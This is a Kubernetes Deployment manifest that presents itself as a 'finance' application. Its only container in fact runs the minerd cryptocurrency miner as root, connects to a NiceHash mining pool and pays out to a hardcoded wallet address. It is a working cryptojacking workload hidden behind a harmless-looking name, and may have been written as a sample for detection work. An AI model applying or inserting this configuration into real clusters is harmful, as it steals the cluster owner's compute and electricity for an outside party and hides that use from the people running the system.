apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: finance
  name: finance
  namespace: finance
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app: finance
  strategy:
    rollingUpdate:
      maxSurge: 25%
      maxUnavailable: 25%
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: finance
    spec:
      containers:
      - command:
        - minerd
        - --url
        - stratum+tcp://sha256.auto.nicehash.com:9200
        - --user
        - 3QuZNH22ey3VCAsm42y4FjWU8ELpLzfxG8
        image: docker.io/dymurray/cpuminer
        imagePullPolicy: Always
        name: minerd
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext:
        runAsUser: 0
      terminationGracePeriodSeconds: 30